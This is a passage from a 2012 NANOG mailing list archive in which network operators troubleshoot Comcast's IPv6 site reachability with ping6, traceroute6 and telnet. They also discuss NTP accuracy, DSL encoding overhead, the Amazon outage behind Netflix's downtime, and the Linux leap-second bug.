> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 Destination unreachable: Administratively prohibited
>
> --- comcast6.net ping statistics ---
> 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms

From John_Brzozowski at Cable.Comcast.com Mon Jul 2 06:06:42 2012
From: John_Brzozowski at Cable.Comcast.com (Brzozowski, John)
Date: Mon, 2 Jul 2012 11:06:42 +0000
Subject: NANOG Digest, Vol 54, Issue 3 (Comcast's IPv6 Information Site Unreachable)
In-Reply-To:
References:
Message-ID:

Folks,

We will report back shortly with some updates.
Thanks for the mail.

John
=========================================
John Jason Brzozowski
Comcast Cable
m) +1-609-377-6594
e) mailto:john_brzozowski at cable.comcast.com
o) +1-484-962-0060
w) http://www.comcast6.net
=========================================
> > [root at server ~]# ping6 comcast6.net > PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 > data bytes > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 > Destination unreachable: Administratively prohibited > From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 > Destination unreachable: Administratively prohibited > ^C > --- comcast6.net ping statistics --- > 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms > > [root at server ~]# traceroute6 comcast6.net > traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops > max, 40 byte packets > 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms > 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms > 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 > ms 29.144 ms > 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms > 28.936 ms 28.097 ms > 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) > 28.059 ms 31.771 ms 57.135 ms > 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms > 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms > 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net > (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms > 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms > 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms > 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) > 81.571 ms 81.507 ms 81.569 ms > 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms > 12 2001:558:d0:33::1 (2001:558:d0:33::1) 
104.686 ms 105.060 ms 105.040 ms > 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 > ms 103.962 ms 104.068 ms > 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms > !X 104.597 ms !X 104.999 ms !X > > Thanks, > Derek > > > > > > > ------------------------------ > > Message: 3 > Date: Sun, 01 Jul 2012 21:44:40 -0400 > From: Derek Ivey > To: Frank Bulk > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: <4FF0FD08.8050706 at derekivey.com> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Thanks for the input guys! Sounds like it might be an issue with my > tunnel then. I had problems getting to a few sites last week > (http://www.dslreports.com/forum/r27265527-IPV6-Issues-Facebook-and-Engadget) > and HE resolved the issue pretty quickly. I will ask them if they are > aware of it. > > Thanks, > Derek > > > On 7/1/2012 9:35 PM, Frank Bulk wrote: >> ICMP to www.comcast6.net has been blocked since 3:16 pm Central on 6/7/2012. >> But their site loads fine over port 80. >> >> Frank >> >> -----Original Message----- >> From: Derek Ivey [mailto:derek at derekivey.com] >> Sent: Sunday, July 01, 2012 6:28 PM >> To: nanog at nanog.org >> Subject: Comcast's IPv6 Information Site Unreachable >> >> Anyone else having trouble getting to Comcast's IPv6 Information site? >> It appears to be unreachable over IPv6. 
>> >> [root at server ~]# ping6 comcast6.net >> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) 56 >> data bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 >> Destination unreachable: Administratively prohibited >> ^C >> --- comcast6.net ping statistics --- >> 5 packets transmitted, 0 received, +5 errors, 100% packet loss, time 4008ms >> >> [root at server ~]# traceroute6 comcast6.net >> traceroute to comcast6.net (2001:558:fe16:7:69:252:216:215), 30 hops >> max, 40 byte packets >> 1 pfsense.d3r3k.net (2001:470:8:d15::1) 0.278 ms 0.282 ms 0.317 ms >> 2 2001:470:7:d15::1 (2001:470:7:d15::1) 20.794 ms 24.746 ms 28.569 ms >> 3 gige-g4-12.core1.ash1.he.net (2001:470:0:90::1) 28.946 ms 29.124 >> ms 29.144 ms >> 4 as6453.gige-g3-16.core1.ash1.he.net (2001:470:0:191::2) 28.917 ms >> 28.936 ms 28.097 ms >> 5 if-ae2.2.tcore2.AEQ-Ashburn.ipv6.as6453.net (2001:5a0:600:500::1) >> 28.059 ms 31.771 ms 57.135 ms >> 6 2001:5a0:600:500::72 (2001:5a0:600:500::72) 28.959 ms >> 2001:559::31d (2001:559::31d) 29.041 ms 29.060 ms >> 7 pos-3-11-0-0-cr01.ashburn.va.ibone.comcast.net >> (2001:558:0:f5a4::1) 32.553 ms 19.810 ms 16.526 ms >> 8 2001:558:0:f669::2 (2001:558:0:f669::2) 39.019 ms 37.954 ms 36.368 ms >> 9 2001:558:0:f57f::1 (2001:558:0:f57f::1) 67.134 ms 67.151 ms 67.166 ms >> 10 pos-2-7-0-0-cr01.denver.co.ibone.comcast.net (2001:558:0:f54d::1) >> 81.571 ms 81.507 ms 81.569 ms >> 11 2001:558:0:f744::2 (2001:558:0:f744::2) 80.633 ms 80.760 ms 79.825 ms >> 12 
2001:558:d0:33::1 (2001:558:d0:33::1) 104.686 ms 105.060 ms 105.040 ms >> 13 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.335 >> ms 103.962 ms 104.068 ms >> 14 te-3-1-ur03.cmc.co.ndcwest.comcast.net (2001:558:d0:5::1) 104.492 ms >> !X 104.597 ms !X 104.999 ms !X >> >> Thanks, >> Derek >> >> >> > > > > > > ------------------------------ > > Message: 4 > Date: Sun, 1 Jul 2012 20:59:42 -0500 > From: Jimmy Hess > To: PC > Cc: "nanog at nanog.org" > Subject: Re: [c-nsp] NTP Servers > Message-ID: > > Content-Type: text/plain; charset=ISO-8859-1 > > On 7/1/12, PC wrote: >> If your application requires sub-5 second accuracy, (such as end of a >> banking day), then Windows NTP is unsuitable for the purpose. > Looks like CYA on Microsoft's part. > > That i've seen, Windows NTP in physical environments with a hardware > system clock not having issues consistently provides accuracy better > than +/- 0.5 against the time source it's synced with, but in > virtual environments, which have incompatibilities with high > sub-second RTC accuracy in the first place, neither Windows nor Unix > NTP services are able to provide that consistently without much > tinkering. > > If it's absolutely critical that you have sub-5 second accuracy, > even Unix NTP is not to be considered good enough, you need highly > accurate hardware time source, something more accurate than the usual > system clock you find in a PC or server. Unix NTP can only do so much > to correct for a broken system clock; although it does do a very > good job disciplining PC real-time clocks that consistently run a bit > too fast or too slow, ultimately the > personal computer clocks can at times be unreliable.... > > If they were perfect, you wouldn't need time sync in the first place; > just set them once, > and correct the annual 0.01 seconds worth of error once a year.... 
> > -- > -JH > > > > ------------------------------ > > Message: 5 > Date: Sun, 1 Jul 2012 21:20:11 -0500 > From: Jimmy Hess > To: Derek Ivey > Cc: nanog at nanog.org > Subject: Re: Comcast's IPv6 Information Site Unreachable > Message-ID: > > Content-Type: text/plain; charset=ISO-8859-1 > > On 7/1/12, Derek Ivey wrote: >> Anyone else having trouble getting to Comcast's IPv6 Information site? >> It appears to be unreachable over IPv6. > > Looks like just ICMP that's broken. > > ~# telnet comcast6.net 80 > Trying 2001:558:fe23:2:69:252:208:135... > Connected to comcast6.net (2001:558:fe23:2:69:252:208:135). > Escape character is '^]'. > HEAD / HTTP/1.1 > Host: comcast6.net > User-Agent: Telnet > > HTTP/1.1 200 OK > Date: Mon, 02 Jul 2012 02:21:33 GMT > Server: Apache/2.2.15 (Red Hat) > X-Powered-By: PHP/5.3.3 > Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ > P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" > Cache-Control: no-cache > Pragma: no-cache > Connection: close > Content-Type: text/html; charset=utf-8 > > Connection closed by foreign host. 
>
>
>
> ~# ping6 comcast6.net
> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net)
> 56 data bytes
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6
> Destination unreachable: Administratively prohibited
> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7
> Destination unreachable: Administratively prohibited
>
> --- comcast6.net ping statistics ---
> 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms
>
>
>
> ------------------------------
>
> Message: 6
> Date: Sun, 1 Jul 2012 19:38:16 -0700
> From: "steve pirk [egrep]"
> To: Jay Ashworth
> Cc: NANOG
> Subject: Re: FYI Netflix is down
> Message-ID:
>
> Content-Type: text/plain; charset=windows-1252
>
> On Sun, Jul 1, 2012 at 11:38 AM, Jay Ashworth wrote:
>
>> Not entirely. Datacenters do go down, our best efforts to the contrary
>> notwithstanding. Amazon doesn't guarantee you redundancy on EC2, only
>> the tools to provide it yourself. 25% Amazon; 75% service provider
>> clients;
>> that's my appraisal of the blame.
>>
>
> From a Wired article:
>
>> That's what was supposed to happen at Netflix Friday night. But it didn't
>> work out that way. According to Twitter messages from Netflix Director of
>> Cloud Architecture Adrian Cockcroft and Instagram Engineer Rick Branson, it
>> looks like an Amazon Elastic Load Balancing service, designed to spread
>> Netflix's processing loads across data centers, failed during the outage.
>> Without that ELB service working properly, the Netflix and Pinterest
>> services hosted by Amazon crashed.
>
> http://www.wired.com/wiredenterprise/2012/06/real-clouds-crush-amazon/
>
> The GSLB fail-over that was supposed to take place for the affected
> services (that had configured their applications to fail-over) failed.
>
> I heard about this the day after Google announced the Compute Engine
> addition to the App Engine product lines they have. The demo was awesome.
> I imagine Google has GSLB down pat by now, so some companies might start
> looking... ;-]
>
> --steve
>
>
> ------------------------------
>
> Message: 7
> Date: Sun, 01 Jul 2012 22:45:51 -0400
> From: Derek Ivey
> To: Jimmy Hess
> Cc: nanog at nanog.org
> Subject: Re: Comcast's IPv6 Information Site Unreachable
> Message-ID: <4FF10B5F.2090205 at derekivey.com>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Someone replied to my DSL Reports thread:
> http://www.dslreports.com/forum/r27289866-
>
> Apparently there is an ACL issue with their load balancer that is
> blocking ICMP and causing PMTU issues for people who use tunnels.
>
> http://www.dslreports.com/forum/r27226136-
>
>
> It looks like it's been going on since June 11. It's strange that
> Comcast hasn't resolved the issue by now.
>
> Thanks,
> Derek
>
> On 7/1/2012 10:20 PM, Jimmy Hess wrote:
>> On 7/1/12, Derek Ivey wrote:
>>> Anyone else having trouble getting to Comcast's IPv6 Information site?
>>> It appears to be unreachable over IPv6.
>> Looks like just ICMP that's broken.
>>
>> ~# telnet comcast6.net 80
>> Trying 2001:558:fe23:2:69:252:208:135...
>> Connected to comcast6.net (2001:558:fe23:2:69:252:208:135).
>> Escape character is '^]'. >> HEAD / HTTP/1.1 >> Host: comcast6.net >> User-Agent: Telnet >> >> HTTP/1.1 200 OK >> Date: Mon, 02 Jul 2012 02:21:33 GMT >> Server: Apache/2.2.15 (Red Hat) >> X-Powered-By: PHP/5.3.3 >> Set-Cookie: 1a3c31c9847a772452af472ce0afd5f3=5hcm2m506se424huah4eo5lvo7; path=/ >> P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" >> Cache-Control: no-cache >> Pragma: no-cache >> Connection: close >> Content-Type: text/html; charset=utf-8 >> >> Connection closed by foreign host. >> >> >> >> ~# ping6 comcast6.net >> PING comcast6.net(speedlab-app05.newcastlerdc.de.panjde.comcast.net) >> 56 data bytes >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=0 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=1 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=2 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=3 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=4 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=5 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=6 >> Destination unreachable: Administratively prohibited >> From te-4-1-ur01.newcastlerdc.de.panjde.comcast.net icmp_seq=7 >> Destination unreachable: Administratively prohibited >> >> --- comcast6.net ping statistics --- >> 8 packets transmitted, 0 received, +8 errors, 100% packet loss, time 6999ms > > > > > End of NANOG Digest, Vol 54, Issue 3 > ************************************ From stb at lassitu.de Mon Jul 2 06:25:43 2012 From: stb at lassitu.de (Stefan Bethke) Date: Mon, 2 Jul 2012 13:25:43 +0200 Subject: How do the lowest layers of the DSL stack work? 
In-Reply-To: References: Message-ID:

On 01.07.2012 at 21:01, James Bensley wrote:
> [15.24 Mbit/s raw bit rate compared to 8.128 Mbit/s net] is quite a drop in speed and I'm trying to understand where this is happening.
...
> According to that extract, it all disappeared because of [Reed-Solomon] encoding, which is hugely vague.

http://en.wikipedia.org/wiki/Reed-Solomon_error_correction#Data_storage

The second paragraph explains that typically the raw bit rate is twice the net rate. The raw bitstream is then encoded further as HDLC or ATM.

Stefan

--
Stefan Bethke Fon +49 151 14070811

From dgolding at ragingwire.com Mon Jul 2 10:01:59 2012
From: dgolding at ragingwire.com (Dan Golding)
Date: Mon, 2 Jul 2012 08:01:59 -0700
Subject: FYI Netflix is down
In-Reply-To:
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us>
Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net>

> -----Original Message-----
> From: Todd Underwood [mailto:toddunder at gmail.com]
>
> scott,
>
> >>
> >> This was not a cascading failure. It was a simple power outage

Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (it's immaterial - the details are probably different, but it illustrates the complexity of a data center failure)

Utility Power Failed
First Backup Generator Failed (shut down due to a faulty fan)
Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker)

In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it.
The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it.

- Dan

> >>
> >> Cascading failures involve interdependencies among components.
> >
> >
> > Not always. Cascading failures can also occur when there is zero
> > dependency between components. The simplest form of this is where one
> > environment fails over to another, but the target environment is not
> > capable of handling the additional load and then "fails" itself as a
> > result (in some form or other, but frequently different to the mode of the original failure).
>
> indeed. and that is an interdependency among components. in
> particular, it is a capacity interdependency.
>
> > Whilst the Amazon outage might have been a "simple" power outage, it's
> > likely that at least some of the website outages caused were a
> > combination of not just the direct Amazon outage, but also the flow-on
> > effect of their redundancy attempting (but failing) to kick in -
> > potentially making the problem worse than just the Amazon outage caused.
>
> i think you over-estimate these websites. most of them simply have no
> redundancy (and obviously have no tested, effective redundancy) and
> were simply hoping that amazon didn't really go down that much.
>
> hope is not the best strategy, as it turns out.
>
> i suspect that randy is right though: many of these businesses do not
> promise perfect uptime and can survive these kinds of failures with
> little loss to business or reputation. twitter has branded its early
> failures with a whale that not only didn't hurt it but helped endear the
> service to millions. when your service fits these criteria, why would
> you bother doing the complicated systems and application engineering
> necessary to actually have functional redundancy?
>
> it simply isn't worth it.
>
> t
>
> >
> >
> > Scott

From toddunder at gmail.com Mon Jul 2 10:30:06 2012
From: toddunder at gmail.com (Todd Underwood)
Date: Mon, 2 Jul 2012 11:30:06 -0400
Subject: FYI Netflix is down
In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net>
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net>
Message-ID:

> Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (it's immaterial - the details are probably different, but it illustrates the complexity of a data center failure)
>
> Utility Power Failed
> First Backup Generator Failed (shut down due to a faulty fan)
> Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker)
>
> In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it. The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it.

ok, i give in. at some level of granularity everything is a cascading failure (since molecules collide and the world is an infinite chain of causation in which human free will is merely a myth)

of course, this use of 'cascading' is vacuous and not useful anymore since it applies to nearly every failure, but i'll go along with it.
from the perspective of a datacenter power engineer, this was a cascading failure of a small number of components.

from the perspective of every datacenter customer: this was a power failure.

from the perspective of people watching B-rate movies: this was a failure to implement and test a reliable system for streaming those movies in the face of a power outage at one facility.

from the perspective of nanog mailing list readers: this was an interesting opportunity to speculate about failures about which we have no data (as usual!).

can we all agree on those facts? :-)

t

From nanog at armoredpackets.com Mon Jul 2 10:41:00 2012
From: nanog at armoredpackets.com (AP NANOG)
Date: Mon, 02 Jul 2012 11:41:00 -0400
Subject: FYI Netflix is down
In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net>
References: <4FEE753C.4030007@thebaughers.com> <8078ED370ADA824281219A7B5BADC39B1D61037C@MBX023-W1-CA-5> <4FEE7671.2060403@thebaughers.com> <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net>
Message-ID: <4FF1C10C.5010201@armoredpackets.com>

While I was working for a wireless telecom company our primary datacenter was knocked off the power grid due to weather, the generators kicked on and everything was fine, till one generator was struck by lightning and that same strike fried the control panel on the second one. Considering the second generator had no control panel we had no means of monitoring it for temp, fuel, input voltage (when it came back), output voltage, surge protection, or ultimately if the generator spiked to go full voltage due to a regulator failure. Needless to say we had to shut the second generator down for safety reasons.

While in the military I saw many generators struck by lightning as well.

I'm not saying Amazon was not at fault here, but I can see where this is possible and happens more frequently than one might think.
I hate to play devil's advocate here, but you as the customer should always have backups to your backups, and practice these fail-overs on a regular basis. Otherwise you are at fault here, no one else...

--
Thank you,
Robert Miller
http://www.armoredpackets.com
Twitter: @arch3angel

On 7/2/12 11:01 AM, Dan Golding wrote:
>> -----Original Message-----
>> From: Todd Underwood [mailto:toddunder at gmail.com]
>>
>> scott,
>>
>>>> This was not a cascading failure. It was a simple power outage
> Actually, it was a very complex power outage. I'm going to assume that what happened this weekend was similar to the event that happened at the same facility approximately two weeks ago (it's immaterial - the details are probably different, but it illustrates the complexity of a data center failure)
>
> Utility Power Failed
> First Backup Generator Failed (shut down due to a faulty fan)
> Second Backup Generator Failed (breaker coordination problem resulting in faulty trip of a breaker)
>
> In this case, it was clearly a cascading failure, although only limited in scope. The failure in this case also clearly involved people. There was one material failure (the fan), but the system should have been resilient enough to deal with it. The system should also have been resilient enough to deal with the breaker coordination issue (which should not have occurred), but was not. Data centers are not commodities. There is a way to engineer these facilities to be much more resilient. Not everyone's business model supports it.
>
> - Dan
>
>
>>>> Cascading failures involve interdependencies among components.
>>>
>>> Not always. Cascading failures can also occur when there is zero
>>> dependency between components.
>>> The simplest form of this is where one
>>> environment fails over to another, but the target environment is not
>>> capable of handling the additional load and then "fails" itself as a
>>> result (in some form or other, but frequently different to the mode of the original failure).
>>
>> indeed. and that is an interdependency among components. in
>> particular, it is a capacity interdependency.
>>
>>> Whilst the Amazon outage might have been a "simple" power outage, it's
>>> likely that at least some of the website outages caused were a
>>> combination of not just the direct Amazon outage, but also the flow-on
>>> effect of their redundancy attempting (but failing) to kick in -
>>> potentially making the problem worse than just the Amazon outage caused.
>>
>> i think you over-estimate these websites. most of them simply have no
>> redundancy (and obviously have no tested, effective redundancy) and
>> were simply hoping that amazon didn't really go down that much.
>>
>> hope is not the best strategy, as it turns out.
>>
>> i suspect that randy is right though: many of these businesses do not
>> promise perfect uptime and can survive these kinds of failures with
>> little loss to business or reputation. twitter has branded its early
>> failures with a whale that not only didn't hurt it but helped endear the
>> service to millions. when your service fits these criteria, why would
>> you bother doing the complicated systems and application engineering
>> necessary to actually have functional redundancy?
>>
>> it simply isn't worth it.
>>
>> t
>>
>>> Scott

From nanog at armoredpackets.com Mon Jul 2 10:47:29 2012
From: nanog at armoredpackets.com (AP NANOG)
Date: Mon, 02 Jul 2012 11:47:29 -0400
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> Message-ID: <4FF1C291.80307@armoredpackets.com> Do you happen to know all the kernels and versions affected by this? -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel On 7/1/12 12:44 PM, George Bonser wrote: > >> -----Original Message----- >> From: Roy >> Sent: Saturday, June 30, 2012 10:03 PM >> To: nanog at nanog.org >> Subject: Re: F-ckin Leap Seconds, how do they work? >> >> >> Talk about people not testing things, leap seconds have been around >> since 1961. There have been nine leap seconds in the last twenty >> years. Any system that can't handle a leap second is seriously flawed. >> > Roy, this was a problem in only certain kernel versions. Unfortunately the range of versions affected are pretty widely deployed right now. Earlier and later versions did not have the problem. > > > > From a.harrowell at gmail.com Mon Jul 2 10:51:41 2012 From: a.harrowell at gmail.com (Alex Harrowell) Date: Mon, 02 Jul 2012 16:51:41 +0100 Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C291.80307@armoredpackets.com> References: <4FEFB944.2010006@paulgraydon.co.uk> <596B74B410EE6B4CA8A30C3AF1A155EA09DF80D3@RWC-MBX1.corp.seven.com> <596B74B410EE6B4CA8A30C3AF1A155EA09DF8311@RWC-MBX1.corp.seven.com> <4FEFD4F5.5090306@derekivey.com> <4FEFDA14.7070403@gmail.com> <596B74B410EE6B4CA8A30C3AF1A155EA09E069E0@RWC-MBX1.corp.seven.com> <4FF1C291.80307@armoredpackets.com> Message-ID: <4FF1C38D.9050009@gmail.com> On 02/07/12 16:47, AP NANOG wrote: > Do you happen to know all the kernels and versions affected by this? 
> 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122 From jra at baylink.com Mon Jul 2 11:04:04 2012 From: jra at baylink.com (Jay Ashworth) Date: Mon, 2 Jul 2012 12:04:04 -0400 (EDT) Subject: F-ckin Leap Seconds, how do they work? In-Reply-To: <4FF1C38D.9050009@gmail.com> Message-ID: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Alex Harrowell" > On 02/07/12 16:47, AP NANOG wrote: > > Do you happen to know all the kernels and versions affected by this? > > 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122 Well, my 2.6.32 CentOS6/64 machine, which is not running Java, just purred right along, logging the leapsecond at 7pm, and not even blinking, so... (Amazon EC2, NTP enabled; 3 strat-2s from us.pool) Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA http://photo.imageinc.us +1 727 647 1274 From bicknell at ufp.org Mon Jul 2 11:09:09 2012 From: bicknell at ufp.org (Leo Bicknell) Date: Mon, 2 Jul 2012 09:09:09 -0700 Subject: FYI Netflix is down In-Reply-To: References: <4FEF19DC.9020901@rollernet.us> <4FEF4394.2030108@rollernet.us> <1C7B96053DD7814496A0D1E71661B68302CF5B79@SMF-ENTXM-001.sac.ragingwire.net> Message-ID: <20120702160909.GA65216@ussenterprise.ufp.org> In a message written on Mon, Jul 02, 2012 at 11:30:06AM -0400, Todd Underwood wrote: > from the perspective of people watching B-rate movies: this was a > failure to implement and test a reliable system for streaming those > movies in the face of a power outage at one facility. I want to emphasize _and test_. Work on an infrastructure which is redundant and designed to provide "100% uptime" (which is impossible, but that's another story) means that there should be confidence in a failure being automatically worked around, detected, and reported. 
I used to work with a guy who had a simple test for these things,
and if I was a VP at Amazon, Netflix, or any other large company I
would do the same. About once a month he would walk out on the
floor of the data center and break something. Pull out an ethernet.
Unplug a server. Flip a breaker.

Then he would wait, to see how long before a technician came to fix
it.

If these activities were service impacting to customers the engineering
or implementation was faulty, and remediation was performed. Assuming
they acted as designed and the customers saw no faults the team was
graded on how quickly they detected and corrected the outage.

I've seen too many companies whose "test" is planned months in advance,
and who exclude the parts they think aren't up to scratch from the test.
Then an event occurs, and they fail, and take down customers.

TL;DR If you're not confident your operation could withstand someone
walking into your data center and randomly doing something, you are
NOT redundant.

--
Leo Bicknell - bicknell at ufp.org - CCIE 3440
PGP keys at http://www.ufp.org/~bicknell/

From mike at mtcc.com Mon Jul 2 11:13:42 2012
From: mike at mtcc.com (Michael Thomas)
Date: Mon, 02 Jul 2012 09:13:42 -0700
Subject: F-ckin Leap Seconds, how do they work?
In-Reply-To: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com>
References: <23616229.12018.1341245044739.JavaMail.root@benjamin.baylink.com>
Message-ID: <4FF1C8B6.6010503@mtcc.com>

On 07/02/2012 09:04 AM, Jay Ashworth wrote:
> ----- Original Message -----
>> From: "Alex Harrowell"
>> On 02/07/12 16:47, AP NANOG wrote:
>>> Do you happen to know all the kernels and versions affected by this?
>> 2.6.26 to 3.3 inclusive per news.ycombinator.com/item?id=4183122
> Well, my 2.6.32 CentOS6/64 machine, which is not running Java, just purred
> right along, logging the leapsecond at 7pm, and not even blinking, so...
> (Amazon EC2, NTP enabled; 3 strat-2s from us.pool)
>

My centos 6/64 running 3.0 seemed to weather it too. I'm not quite clear
